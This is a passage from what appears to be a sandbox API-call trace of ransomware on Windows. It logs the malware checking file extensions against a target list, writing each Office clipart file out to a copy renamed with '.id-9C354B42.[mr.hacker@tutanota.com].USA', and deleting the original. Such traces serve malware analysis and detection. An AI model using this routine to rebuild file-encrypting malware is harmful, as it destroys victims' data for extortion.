(lpString=".dbf") returned 4 [0271.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.554] lstrlenW (lpString=".1cd") returned 4 [0271.554] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00814_.WMF") returned 63 [0271.554] lstrlenW (lpString=".jpg") returned 4 [0271.554] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.555] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.555] lstrlenW (lpString="FD00965_.WMF") returned 12 [0271.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.555] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=15164) returned 1 [0271.556] CloseHandle (hObject=0x390) returned 1 [0271.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf")) returned 0x20 [0271.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.556] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.556] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.556] GetLastError () returned 0x0 [0271.556] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x3b3c, lpOverlapped=0x0) returned 1 [0271.558] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x3b40, lpOverlapped=0x0) returned 1 [0271.559] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.559] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.559] SetEndOfFile (hFile=0x2a8) returned 1 [0271.559] CloseHandle (hObject=0x2a8) returned 1 [0271.559] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.559] SetEndOfFile (hFile=0x390) returned 1 [0271.561] CloseHandle (hObject=0x390) returned 1 [0271.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00965_.wmf")) returned 1 [0271.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.562] lstrlenW (lpString=".doc") returned 4 [0271.562] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString=".docx") returned 5 [0271.562] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.562] lstrlenW (lpString=".pdf") returned 4 [0271.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString=".xls") returned 4 [0271.562] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.562] lstrlenW (lpString=".xlsx") returned 5 [0271.562] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.562] lstrlenW (lpString=".ppt") returned 4 [0271.562] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.562] lstrlenW (lpString=".zip") returned 4 [0271.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.562] lstrlenW (lpString=".rar") returned 4 [0271.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString=".bz2") returned 4 [0271.562] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString=".7z") returned 3 [0271.562] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.562] lstrlenW (lpString=".dbf") returned 4 [0271.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.562] lstrlenW (lpString=".1cd") returned 4 [0271.562] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.562] lstrlenW (lpString=".jpg") returned 4 [0271.562] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.563] lstrlenW (lpString=".doc") returned 4 [0271.563] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString=".docx") returned 5 [0271.563] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.563] lstrlenW (lpString=".pdf") returned 4 [0271.563] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString=".xls") returned 4 [0271.563] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.563] lstrlenW (lpString=".xlsx") returned 5 [0271.563] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.563] lstrlenW (lpString=".ppt") returned 4 [0271.563] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.563] lstrlenW (lpString=".zip") returned 4 [0271.563] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.563] lstrlenW (lpString=".rar") returned 4 [0271.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString=".bz2") returned 4 [0271.563] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString=".7z") returned 3 [0271.563] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.563] lstrlenW (lpString=".dbf") returned 4 [0271.563] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.563] lstrlenW (lpString=".1cd") returned 4 [0271.563] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 63 [0271.563] lstrlenW (lpString=".jpg") returned 4 [0271.563] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.564] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.564] lstrlenW (lpString="FD01074_.WMF") returned 12 [0271.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.564] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=4634) returned 1 [0271.564] CloseHandle (hObject=0x390) returned 1 [0271.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf")) returned 0x20 [0271.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.564] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.564] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.565] GetLastError () returned 0x0 [0271.565] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x121a, lpOverlapped=0x0) returned 1 [0271.566] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x1220, lpOverlapped=0x0) returned 1 [0271.567] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.567] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.567] SetEndOfFile (hFile=0x2a8) returned 1 [0271.567] CloseHandle (hObject=0x2a8) returned 1 [0271.567] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.567] SetEndOfFile (hFile=0x390) returned 1 [0271.569] CloseHandle (hObject=0x390) returned 1 [0271.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.569] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf")) returned 1 [0271.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.569] lstrlenW (lpString=".doc") returned 4 [0271.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.569] lstrlenW (lpString=".docx") returned 5 [0271.569] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.569] lstrlenW (lpString=".pdf") returned 4 [0271.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.569] lstrlenW (lpString=".xls") returned 4 [0271.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.570] lstrlenW (lpString=".xlsx") returned 5 [0271.570] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.570] lstrlenW (lpString=".ppt") returned 4 [0271.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.570] lstrlenW (lpString=".zip") returned 4 [0271.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.570] lstrlenW (lpString=".rar") returned 4 [0271.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString=".bz2") returned 4 [0271.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString=".7z") returned 3 [0271.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.570] lstrlenW (lpString=".dbf") returned 4 [0271.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.570] lstrlenW (lpString=".1cd") returned 4 [0271.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.570] lstrlenW (lpString=".jpg") returned 4 [0271.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.570] lstrlenW (lpString=".doc") returned 4 [0271.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.570] lstrlenW (lpString=".docx") returned 5 [0271.570] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.570] lstrlenW (lpString=".pdf") returned 4 [0271.571] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.571] lstrlenW (lpString=".xls") returned 4 [0271.571] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.571] lstrlenW (lpString=".xlsx") returned 5 [0271.571] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.571] lstrlenW (lpString=".ppt") returned 4 [0271.571] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.571] lstrlenW (lpString=".zip") returned 4 [0271.571] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.571] lstrlenW (lpString=".rar") returned 4 [0271.571] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.571] lstrlenW (lpString=".bz2") returned 4 [0271.571] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.571] lstrlenW (lpString=".7z") returned 3 [0271.571] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.571] lstrlenW (lpString=".dbf") returned 4 [0271.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.571] lstrlenW (lpString=".1cd") returned 4 [0271.571] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF") returned 63 [0271.571] lstrlenW (lpString=".jpg") returned 4 [0271.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.571] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.571] lstrlenW (lpString="FD01084_.WMF") returned 12 [0271.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.572] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2412) returned 1 [0271.572] CloseHandle (hObject=0x390) returned 1 [0271.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf")) returned 0x20 [0271.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.572] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.572] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0271.573] GetLastError () returned 0x0 [0271.573] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x96c, lpOverlapped=0x0) returned 1 [0271.810] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x970, lpOverlapped=0x0) returned 1 [0271.812] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.812] WriteFile (in: hFile=0x2a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.812] SetEndOfFile (hFile=0x2a8) returned 1 [0271.812] CloseHandle (hObject=0x2a8) returned 1 [0271.812] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.812] SetEndOfFile (hFile=0x390) returned 1 [0271.814] CloseHandle (hObject=0x390) returned 1 [0271.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.816] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01084_.wmf")) returned 1 [0271.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.817] lstrlenW (lpString=".doc") returned 4 [0271.817] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString=".docx") returned 5 [0271.817] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.817] lstrlenW (lpString=".pdf") returned 4 [0271.817] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString=".xls") returned 4 [0271.817] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.817] lstrlenW (lpString=".xlsx") returned 5 [0271.817] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.817] lstrlenW (lpString=".ppt") returned 4 [0271.817] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.817] lstrlenW (lpString=".zip") returned 4 [0271.817] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.817] lstrlenW (lpString=".rar") returned 4 [0271.817] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString=".bz2") returned 4 [0271.817] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString=".7z") returned 3 [0271.817] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.817] lstrlenW (lpString=".dbf") returned 4 [0271.817] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.817] lstrlenW (lpString=".1cd") returned 4 [0271.817] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.817] lstrlenW (lpString=".jpg") returned 4 [0271.817] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.818] lstrlenW (lpString=".doc") returned 4 [0271.818] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString=".docx") returned 5 [0271.818] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.818] lstrlenW (lpString=".pdf") returned 4 [0271.818] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString=".xls") returned 4 [0271.818] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.818] lstrlenW (lpString=".xlsx") returned 5 [0271.818] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.818] lstrlenW (lpString=".ppt") returned 4 [0271.818] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.818] lstrlenW (lpString=".zip") returned 4 [0271.818] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.818] lstrlenW (lpString=".rar") returned 4 [0271.818] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString=".bz2") returned 4 [0271.818] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString=".7z") returned 3 [0271.818] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.818] lstrlenW (lpString=".dbf") returned 4 [0271.818] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.818] lstrlenW (lpString=".1cd") returned 4 [0271.818] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01084_.WMF") returned 63 [0271.818] lstrlenW (lpString=".jpg") returned 4 [0271.818] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.819] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.819] 